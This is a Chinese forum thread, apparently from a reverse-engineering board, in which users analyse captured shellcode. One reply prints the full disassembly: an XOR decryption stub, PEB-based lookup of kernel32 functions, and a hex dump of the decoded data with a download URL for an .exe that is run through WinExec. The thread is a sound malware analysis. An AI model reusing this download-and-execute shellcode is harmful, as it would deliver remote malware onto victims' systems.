能力值:
( LV3,RANK:20 )
|
-
-
2 楼
估计下载的是http://www.tian6.com/racle/123456789.exe,而且不知道代码是从哪里开始,什么也看不出来,可能并不是完整的shellcode
|
能力值:
( LV2,RANK:10 )
|
-
-
3 楼
前12字节可能是配合溢出用的。
00000000 20 60 41 00 B8 0E FA 7F B7 0E FA 7F `A.????冹p
从第13字节开始分析。
0000000C 83EC 70 sub esp, 70
0000000F EB 10 jmp short 00000021
00000011 5A pop edx
00000012 4A dec edx
00000013 33C9 xor ecx, ecx
00000015 66:B9 3C01 mov cx, 13C
00000019 80340A 99 xor byte ptr [edx+ecx], 99
0000001D ^ E2 FA loopd short 00000019
0000001F EB 05 jmp short 00000026
00000021 E8 EBFFFFFF call 00000011
00000026 70 4C jo short 00000074
......
上面是一个解密循环,把从0x26开始的0x13C字节xor 0x99。看看解密后的内容。
00000026 E9 D5000000 jmp 00000100
0000002B 5A pop edx
0000002C 64:A1 30000000 mov eax, dword ptr fs:[30]
00000032 8B40 0C mov eax, dword ptr [eax+C]
00000035 8B70 1C mov esi, dword ptr [eax+1C]
00000038 AD lods dword ptr [esi]
00000039 8B40 08 mov eax, dword ptr [eax+8]
0000003C 8BD8 mov ebx, eax
0000003E 8B73 3C mov esi, dword ptr [ebx+3C]
00000041 8B741E 78 mov esi, dword ptr [esi+ebx+78]
00000045 03F3 add esi, ebx
00000047 8B7E 20 mov edi, dword ptr [esi+20]
0000004A 03FB add edi, ebx
0000004C 8B4E 14 mov ecx, dword ptr [esi+14]
0000004F 33ED xor ebp, ebp
00000051 56 push esi
00000052 57 push edi
00000053 51 push ecx
00000054 8B3F mov edi, dword ptr [edi]
00000056 03FB add edi, ebx
00000058 8BF2 mov esi, edx
0000005A 6A 0E push 0E
0000005C 59 pop ecx
0000005D F3:A6 repe cmps byte ptr es:[edi], byte ptr [esi]
0000005F 74 08 je short 00000069
00000061 59 pop ecx
00000062 5F pop edi
00000063 83C7 04 add edi, 4
00000066 45 inc ebp
00000067 ^ E2 E9 loopd short 00000052
00000069 59 pop ecx
0000006A 5F pop edi
0000006B 5E pop esi
0000006C 8BCD mov ecx, ebp
0000006E 8B46 24 mov eax, dword ptr [esi+24]
00000071 03C3 add eax, ebx
00000073 D1E1 shl ecx, 1
00000075 03C1 add eax, ecx
00000077 33C9 xor ecx, ecx
00000079 66:8B08 mov cx, word ptr [eax]
0000007C 8B46 1C mov eax, dword ptr [esi+1C]
0000007F 03C3 add eax, ebx
00000081 C1E1 02 shl ecx, 2
00000084 03C1 add eax, ecx
00000086 8B00 mov eax, dword ptr [eax]
00000088 03C3 add eax, ebx
0000008A 8BFA mov edi, edx
0000008C 8BF7 mov esi, edi
0000008E 83C6 0E add esi, 0E
00000091 8BD0 mov edx, eax
00000093 6A 04 push 4
00000095 59 pop ecx
00000096 E8 50000000 call 000000EB
0000009B 83C6 0D add esi, 0D
0000009E 52 push edx
0000009F 56 push esi
000000A0 FF57 FC call dword ptr [edi-4]
000000A3 5A pop edx
000000A4 8BD8 mov ebx, eax
000000A6 6A 01 push 1
000000A8 59 pop ecx
000000A9 E8 3D000000 call 000000EB
000000AE 83C6 13 add esi, 13
000000B1 56 push esi
000000B2 46 inc esi
000000B3 803E 80 cmp byte ptr [esi], 80
000000B6 ^ 75 FA jnz short 000000B2
000000B8 8036 80 xor byte ptr [esi], 80
000000BB 5E pop esi
000000BC 83EC 20 sub esp, 20
000000BF 8BDC mov ebx, esp
000000C1 6A 20 push 20
000000C3 53 push ebx
000000C4 FF57 EC call dword ptr [edi-14]
000000C7 C70403 5C612E65 mov dword ptr [ebx+eax], 652E615C
000000CE C74403 04 78650>mov dword ptr [ebx+eax+4], 6578
000000D6 33C0 xor eax, eax
000000D8 50 push eax
000000D9 50 push eax
000000DA 53 push ebx
000000DB 56 push esi
000000DC 50 push eax
000000DD FF57 FC call dword ptr [edi-4]
000000E0 8BDC mov ebx, esp
000000E2 50 push eax
000000E3 53 push ebx
000000E4 FF57 F0 call dword ptr [edi-10]
000000E7 50 push eax
000000E8 FF57 F4 call dword ptr [edi-C]
000000EB 33C0 xor eax, eax
000000ED AC lods byte ptr [esi]
000000EE 85C0 test eax, eax
000000F0 ^ 75 F9 jnz short 000000EB
000000F2 51 push ecx
000000F3 52 push edx
000000F4 56 push esi
000000F5 53 push ebx
000000F6 FFD2 call edx
000000F8 5A pop edx
000000F9 59 pop ecx
000000FA AB stos dword ptr es:[edi]
000000FB ^ E2 EE loopd short 000000EB
000000FD 33C0 xor eax, eax
000000FF C3 retn
00000100 E8 26FFFFFF call 0000002B
00000105 47 inc edi
从0x105开始就是数据了。
00000105 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 47 GetProcAddress.G
00000115 65 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 etSystemDirector
00000125 79 41 00 57 69 6E 45 78 65 63 00 45 78 69 74 54 yA.WinExec.ExitT
00000135 68 72 65 61 64 00 4C 6F 61 64 4C 69 62 72 61 72 hread.LoadLibrar
00000145 79 41 00 75 72 6C 6D 6F 6E 00 55 52 4C 44 6F 77 yA.urlmon.URLDow
00000155 6E 6C 6F 61 64 54 6F 46 69 6C 65 41 00 68 74 74 nloadToFileA.htt
00000165 70 3A 2F 2F 77 77 77 2E 74 69 61 6E 36 2E 63 6F p://www.tian6.co
00000175 6D 2F 72 61 63 6C 65 2F 31 32 33 34 35 36 37 38 m/racle/12345678
00000185 39 2E 65 78 65 80 00 00 9.exe€..
后面的没仔细分析,不过从数据里面也猜出来了怎么做的了。用PEB查找kernel32的GetProcAddress,然后查找函数下载exe运行。很标准的shellcode。
|
能力值:
( LV2,RANK:10 )
|
-
-
4 楼
谢谢楼上两位的解答
特别感谢 icersg 拷贝下来慢慢消化
|